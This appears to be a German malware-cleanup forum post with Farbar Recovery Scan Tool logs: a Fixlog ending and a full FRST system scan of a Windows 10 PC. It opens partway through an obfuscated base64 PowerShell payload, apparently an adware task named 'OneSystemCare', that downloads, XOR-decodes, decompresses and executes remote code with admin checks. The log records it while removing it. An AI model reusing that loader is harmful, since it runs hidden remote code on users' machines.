EoAVwB4AGgAcQA2AGQAZQBCADQAWgBCAHQAbAB5AEsAdABiAHgAbgB2AEUAOABYAHMAOABzAEoAUwB2AG8AcgBQAGcAdgBoAE4AdQBpAFIAUgBUAEYAVABMAC0ASABvAC0AbwBUADEATABtAE8ARwBCAGgAaQBMAHQAWQB4AFAARQBQAGEAYwBGAEcANQBfAGIASQBGAHQAXwAxAEwAYwBEADUAeABQADIAUgBOAHAAagBFAFMAcgBrAG4AMgBMADQAaABiADYATwBxAGoARQBIAGYAeABwAHAALQBSAFEAQwA0AFMAdAB4AEgASQBZAFYAQQA4AFEATABiAEsAcQAtAHEANgBfAHQAVQBrADgAMAA3AE8AVwBOAEMAaABvAC0AbgAyAGkAdABoAE8AYgBaADcATgBJAFAAawBhAHgAbwAtAEsAbQA0AFMAVQBFAEcAQwBpAGMAcQBIAGUASgBPAFUAbQAxAEoAaABkAHgAQwBhAC0AVABNAHIAaABVAHUAXwBmAEUATgBFAE0AVwBmAEoAagBfAGwASQBNAE4AXwBiAC0ARAA2AG0AcwAtADUAUQBRAG4AWQBGAHAAUgBFADMAbgBRAHAAUwBWAEEAZwAxAHEAMwBIAF8AMQBCAFUAaQBGADIAdwAxAFUAWABuAGUANABpAFAAXwBmAE0ATQBpAHAAdwBKAEMANQBYAFQAUQBZAFkAZQA5AFEAcwBvAFIAaABwAHYAWgBuAEMASgBqAGYAbQBnAC0AVQBBAFQAOQB0ADQATgA4AGUAcQBZAG0AbQBYADkAcQBQADcAUgBkAHUAdwBxADYASgA4AFYATgB1AEwAeABpAGQAeAAxAG4ARABEAEIAaABtAFYAWQA5AGkASQBGAEgARgB6AGIAWABNAFcAWABUAE0AVQBDAFcAWgByADEAcQBEAFoAbwBQAHkANwBEAFoAbwB0AHgAMQAzAFkARQBfADIAaAB0AFEAVAByAFQASgBYAEgAWABNAFoAbABVADcAWABTAG0AVABkAGUAZABPAEUAdQBwAEIAcQBZAGQANQBZAG8AMgBDAC0ASgBRAGQASwBvADQAawB0AGYAVQBLAE0AawBJADYAWQAtAEsARQBKAEkAbAByAC0AVgBGAFYARABiAFoANwBFAG8AagBIAHEAUABNAGoAbwBkAHgAVgA3AEIAZQBpADgAQgAwAHoATABzAGUAZQBZAEMAbgBSAEcAUgA4AFYAawBlADQAeQAyAGMAMgBhAFAAZwBXAGcAMQBUAHYAUQA5AEgARABsAGgAQQBlAE0AdgBiAF8ANQBhAFQAYgA4ADEAbABCAEYAVgBlAFIAbwB0AFEANgA2AHkAeQBDADcATwBjAFkANAA4AEIALQBlAE4ANwAyAG0AWgBfAEIAdwAxAHYAVgBuADIAMABIAFAAWQBlAE0AcAA1AFcASgAxAE4AWgBpAE8ARAAtAEUARQB3AHEAcQBKAGoATgB2AF8AMABpADMARgBMAHUASwBvAE0AOABuAE0AawA3AGIAaQAyAEgAXwBTAEkALQBzAFIARQBVAHgANwBxADMAMQBZAGUAUQA1ADIAOQAyAGUAYQBlAGUAdQAxAGkASABSAG8AcwA3AFUAdAB6AGYAYQB4AGIAcABIAEIAZQAzAHkAcgByAFYAOQBsAHIAXwA2AEkAOQB3AC0AawBEAE8AOQBsAGgAYwBrAEIAegBTAG0AQgA2ADMAVAA1AGwAdQA5AHEAcwBpAFkANQBJAHgASQA5ADAARQBlAHYATgBOADEAcgBDAHYAbABwADAATgBZAF8AVgBWAGEAeABnAHcAbQBoAEYAQQBOADEANwAtAEgARgAzAGQAawB2AHAAawBYAEgAWgBkAEYATQBpAGUAOQBCAGcAbwBTAE4ATwAwAHUAXwBOAHcAdgBTAGsAbQBrAFgAVwBvAFoAUwBKADcAeABRAG8AMABiAGEASABRAHMASgBpAGYAYQBqADAASgBEAFoAQQBnAGwAVABpAFAALQB0AGIAbwA2AEcAagBiAGwAUwBXAEoASwBiAFEAOQBwADgARwBaAC0AMABxAHQAbwA0AC0AUgBWAHAAYwBrAGYAZQBPAFkANwBwAGEAcgA3AFkAbQB6AFIATwBVAEgAbwBDAFQATwA5AEEAZQA5AEwAcABHAEsANAAxAHAAZwBMAHUAcgB5AEEAVwB0ADAAcwBNAEYAQQA5ADEAbQAwAFMAegB3AHQAUQAmAGMAPQBvAHkAMgBYADYAbABkAF8AZQBrAFUAbAByAEsAbQBiADcARgBIAFgAcQB5AE8ARABkAEUAVwBlAE8AdwBtAEMAXwBkAGoAagBrAC0AMgA1AHoAdgBrAFIAXwB2AFoAQwBZAFcAdwBQAE4AQwA1AG8AZgBSAF8AaQAwAHoANwBtAE8ASwBZAEUAQQBmAGkAQwBuAFQAdQBVAFAAXwA3AE8AbQBaADAALQBPAHYAUQBzAHMAQgBrAHIAZAA1ADgAZAB0AEMAdQBrAFQAbgBRADgAZgBiAHAAbAB5AHAAegBLADkANgBDAHMANQB3AGEAbQBjAGUAMQBTADgAXwBiAGsAMwBRAGkATwBLAFUAeQBzAG4AbgBPADEAOABpAFgAQQBLAGIAdgBlAEEAWgA0AHQAMABiAGoAbABMAGoAWgBtAGcAegBNAEUAcwBnAHYASgBRADcAcgBZAE0ALQBSAHUAbwBlAE4ATQBTAGkAZgBxAHMAeAAyAEcAeQBtAG0AMgB3ADkAQQBLAHQANAA3AEMAMQBrAEYAZQBwAEsAOQAwAFAAawBVAEIAeAA3ADAAbQAwAEkANwBDAEYAXwBKAG0AYwB2AEIAVQBzAHEAZQA5AFYATwBoAEsAawBIAHAATgBBAHUARABUAG4AbgBuAE4ASQBxAEwAdwBSADIASgB4AHEAQwB1AHEAMgBmADQAVAByAHQAXwBTAEYAUgBIAC0AcAA3ADkANAA5ADUAcAA1AEUATwBDAEQAcgBtAFYAZAB2AHgAQgBlAGUAbABaAHcAWQBpAHIATwBLADcAMQAyAFUAeQBJAG8ANwB4AFIALQBJAGoAUwBCAG8AaABZAF8AZgBHAG4AOQBzAEkAdwB5AE4AMwB2ADIAaQBaAHMARgBrAHcATgBXAHgAeAA5AC0ATQBtAGcAMwBaAGsAMgByAE0AMgBLADMAOQA3AGcAMQBlAC0ASgBMAHcAZQBtAHIAUgB2AHAALQB4AFgARgB6AEwAVQByAFQATwBMAE0ALQBTAEEAbQB1AGMAWAA1AGkAZAB5AFcAZwA1AHIAeABGAEMATAA2ADIAOABrAFUAbAB2AHAAZABIAGkAMABRAGUAaAAtAG0AeABmAGQARgA4AFIAVQBqADUAQQBuAGMAVAB2ADAAYQBiAEIAawBzAGgAcABvAGgAcAAwADIATwBkAFoANQBBAFcAeQBZAE4AcQBpAEgANQBTAEQAawBUAHkAdwBZADgAegBCAGsANwBrAHYAQgBNAF8AZgBLAFEAZABwAGUAVAAyAEIANAB6AFkAdwAzAGUAUwBRAEEANQBuADQANgBfADgAZgBpAFcAeABVADYAegBXAHEAVgBhAG4AegBHAFEAUAB0AGcAOAB2AHIAYwBhAEwAdQBqAGkAdwBZADAASgBGAFMAVgAxAE4AeABlAHMAVQBvADAARABwAGgAdwBKAE8AZwAzADIAdgBxAFAAYwBKADkAYwBaAEYAbwB2ADEAdwBSAHgAdwBWAFQAUQBXAFAAUgBZAFQAawBKADcAQgB0AHQAawBGAHQAYgBuAEUAegBvAEEAXwBYAEQARQA2AEMAUgBpAFgAeQBFAFEAQwBVAFAAVQBkAFAAdgBCAHcAVwB1AEQAMgBWAEQAUwBqAEkARABEAFAARAB0AHAATgBLAGwAcwBJAEwAQQBsAGsAXwBWAHEATAA3AHcAYQBFADkAZgBfAGkARQBFADAAMABJAF8AQwBnADgAWgBVAEcAeABxAEkAUAAxAG4AagBPAEgAagAzAGYARQBUAFUAdQByADAAOQBNADAASwBZAEQAZABYAHAATQB4AHUAcwByAE0AcQBuADUAbQBVAHoATABsAGoAdABvAEsAagA0AGYAdwB1AHcANwAxAHAATwBjAFgAVQBTAHcAYgBMAHIASgBEADkAZgAwAEUASgB1AG0AaABpAHMANgA3AEgAeABCADUARABMAE4ASgBTAEsAUAB4AEkASABkAHIAbgBWAEMAMAB4AG0AWgA2AEgAdgAyAGgAaAA4ADAAUwBMAGMAagBkAHQANwAtADAAVwB5AEkAcgA1AEwARQBzADYASgBHADQAVQBjADMAeAA3AFEAOAA0ADkAWAB3AF8AcgBfAE0ARgBBAG0AYwAtAFUAbAB1AE8AdABKAEUAVQBFADAARQBiAGsAOQBJADIAaQBGAGsANAA3AG0ARABXAFEAcAB1AHcAcwBYAEkAVAAxAHAAUAAtAGoAYgBzAGUAMAA5AHgAYQBTAF8ASgByAFAAbABxAFEAeABLAEYAYgB1AEUATwBoAG4AMwBEAEIATgB6AFcAcwA4AEUAYwBiAFMAcgBTAFQAQwBPAHUASABSAEMAVABrAHYAOQByADcARQAxAFgAVgBIAHgAWgBBAGwAWQA2ADQAeQBTAHYATwBzAGcAYwBFAFAANAA0AFAAXwBPAFcAeABjAGkAVABFAGMAYgBTAGIARQB6ADgAbwA1AGcAcQBhAGoAbQAyAFYAUgBSAGoAJgByAD0ANAA1ADMAMwA5ADMAMwAyADkAMAA1ADkAMQAwADIAOQAwADcAMgAiADsAJABzAHQAcwBrAD0AIgB7ADcAOQAwADUANwA4ADQANwAtADAARgAwADUALQAwADgAMABGAC0AMABCADEAMQAtADAARAAwAEQANwBGADAAOQAxADEANwBFAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBKAFAASgBKAFMAVABPAE4AIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=</Arguments>
      <WorkingDirectory>C:\Windows\system32\WindowsPowershell\v1.0</WorkingDirectory>
    </Exec>
  </Actions>
</Task>
========= Ende von CMD: =========

HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveTypeAutoRun => Wert erfolgreich entfernt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
MSICDSetup => Dienst erfolgreich entfernt
NTIOLib_1_0_C => Dienst erfolgreich entfernt
EmptyTemp: => 5.4 GB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 07:36:25 ====
         
FRST.txt
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
durchgeführt von Hanns (Administrator) auf DESKTOP-4RSISKL (28-02-2016 07:40:21)
Gestartet von C:\Users\Hanns\Downloads
Geladene Profile: Hanns (Verfügbare Profile: Hanns)
Platform: Windows 10 Home Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Users\Hanns\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Spotify Ltd) C:\Users\Hanns\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14021336 2015-06-18] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3014224 2016-02-04] (Valve Corporation)
HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Run: [Spotify Web Helper] => C:\Users\Hanns\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-01-31] (Spotify Ltd)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{59e7dc04-eb0d-4e2b-9b09-a2c228e495f8}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 

FireFox:
========
FF ProfilePath: C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Extension: ProxTube - Unblock YouTube - C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default\Extensions\ich@maltegoetz.de.xpi [2015-12-17]
FF Extension: Adblock Plus - C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Profiles\9917pee9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-24]

Chrome: 
=======
CHR Profile: C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-01]
CHR Extension: (Google Docs) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-01]
CHR Extension: (Google Drive) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-01]
CHR Extension: (YouTube) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-01]
CHR Extension: (Google-Suche) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-01]
CHR Extension: (Google Tabellen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-02-01]
CHR Extension: (YouTube To MP3!) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgdohmjplligggendhbmghhmpphabopi [2016-02-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-01]
CHR Extension: (Google Mail) - C:\Users\Hanns\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-01]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [350312 2015-09-05] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Datei ist nicht signiert]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223520 2015-07-10] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 e1dexpress; C:\Windows\system32\DRIVERS\e1d65x64.sys [530416 2015-06-18] (Intel Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184608 2015-07-07] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
S3 SIVDriver; C:\Windows\system32\Drivers\SIVX64.sys [159952 2015-11-14] (Ray Hinchliffe)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-28 07:35 - 2016-02-28 07:36 - 00015567 _____ C:\Users\Hanns\Downloads\Fixlog.txt
2016-02-27 22:10 - 2016-02-27 22:10 - 00003702 _____ C:\Users\Hanns\Desktop\mbam.txt
2016-02-27 21:59 - 2016-02-27 21:59 - 00001887 _____ C:\Users\Hanns\Desktop\AdwCleaner[C1].txt
